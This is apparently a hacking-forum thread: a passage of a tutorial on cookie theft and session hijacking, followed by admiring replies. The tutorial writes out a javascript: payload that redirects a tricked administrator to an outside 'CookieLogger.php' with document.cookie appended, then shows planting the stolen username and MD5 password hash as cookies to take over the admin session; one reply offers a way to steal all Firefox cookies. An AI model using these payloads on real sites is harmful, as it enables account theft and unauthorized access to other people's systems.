Cookie Manipulation [Tutorial]
tag** in HTML. Now all that is left is to forge the Javascript code that we are going to use to trick the admin to our cookie stealer. ```javascript:void(window.location="www.[Censored].com/CookieLogger.php" + document.cookie)``` The **void() function** in Javascript indicates that the link will open on the same page. The **window.location** serves the role of **** in HTML - Redirecting. And the document.cookie is the part where we grab the cookie from the user. Ok, say we've got the cookie logged successfully. We now need to change our session value to the one we've got. ![Image](http://i.imgur.com/u3ika.jpg) strUsername=Administrator%40Account strPassword=5b3de25c4dba50d2102281633d339b48 Now right click and Edit the cookie. That way we'll get the last active session of the administrator. ![Image](http://i.imgur.com/I2gXw.jpg) We will do the same thing with the password. But note that it's hashed in MD5. **Notice:** Do NOT try cracking the hash and then place it's plaintext as a session value. It needs to be hashed in order to be parsed by the server. ![Image](http://i.imgur.com/UHRqz.jpg) You can also get to use the session within the URL bar. Delete the address and type: ```javascript:void(document.cookie="strUsername=Administrator%40Account")``` Then the same process for the password ```javascript:void(document.cookie="strPassword=5b3de25c4dba50d2102281633d339b48")``` *That ends the tutorial. Hope you got something out of it. Thanks for reading!* [/font]
nice tut and usefull too keeper and as i said maybe someone will post something someday nd maybe its soon and we appreciate your hard work
If you make people think they’re thinking, they’ll love you. but if you really make them think, they’ll hate you.
~ Harlan Ellison
when the time has come , I shall rise and conquer the world
what u need is what u get when u’re hacker !!! xx
Nice tutorials Keeper, I don’t personally know where you find the time to do these :P Good work I’ll be giving them all a thorough read when I finish work :)
I would love to change the world, but they won’t give me the source code.
EEEEE EEEEE EEEEE EEEEE EEEEE EEE
E E E E E EEE
EEE EEE EEE EEE EEE EE
E E E E E
EEEEE EEEEE EEEEE EEEEE EEEEE @
Nice tutorials Keeper, I don’t personally know where you find the time to do these Good work I’ll be giving them all a thorough read when I finish work
Well since some methods like LDAP Injections are rare, I decide to post tutorials on them. And eventually from hackforums.net to spread them here and on other forums so that people may learn something new apart from the casual SQLi and XSS..
If you make people think they’re thinking, they’ll love you. but if you really make them think, they’ll hate you.
~ Harlan Ellison
so true keeper , i just heard about this way . but i also read more than once of your post to understand because this kind of new to me
when the time has come , I shall rise and conquer the world
Help me with Cookie Stealer
very good but i have a good one i saw somewhere that maybe you can incorporate int this it is a way to steal all firefox cookies can i add that here?
i bake therefore im fried!!